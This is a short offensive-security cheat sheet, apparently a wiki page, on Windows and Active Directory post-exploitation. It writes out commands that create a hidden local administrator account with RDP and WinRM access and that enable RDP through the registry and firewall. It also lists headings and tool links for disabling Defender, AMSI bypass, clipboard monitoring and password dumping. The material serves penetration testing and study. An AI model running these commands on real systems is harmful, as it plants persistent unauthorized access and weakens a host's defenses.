Post Exploitation

Active Directory Post Exploitation Checklists

RDP Stuff

Add Local Administrator

Create user asuka and add to RDP, Admin, and WinRM.

net user asuka 'TrYh@rdeR!' /add
net localgroup "Remote Desktop Users" asuka /add
net localgroup "Administrators" asuka /add
net localgroup "Remote Management Users" asuka /add

Enable RDP Access

Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -
name "fDenyTSConnections" -value 0
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"

# In case powershell is not enabled (like in old machine)
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes

Access RDP

Defender and Firewall Stuff

Turn Off Firewall

Disable Defender Real Time Monitoring

Bypassing PowerShell Security

Using InviShell - https://github.com/OmerYa/Invisi-Shell

AMSI Bypass

Detection: https://github.com/RythmStick/AMSITrigger

OPSEC with Loader

Get-ClipboardContents

Monitors the clipboard on a specified interval for changes to copied text.

WADComs

WADComs is an interactive cheat sheet, containing a curated list of offensive security tools and their respective commands, to be used against Windows/AD environments.

Dump Saved Password

TCP Port Scanner

Ping Sweep

Inveigh

Responder, but in Powershell/C#

MDE Enum

How to extract Windows Defender Exclusions and Attack Surface Reduction (ASR) rules without Admin privileges

MDE Enum

Or, use this Powershell script.

Enumerate Defender Exclusions

Reference:

Other Useful Stuff

Last updated

Was this helpful?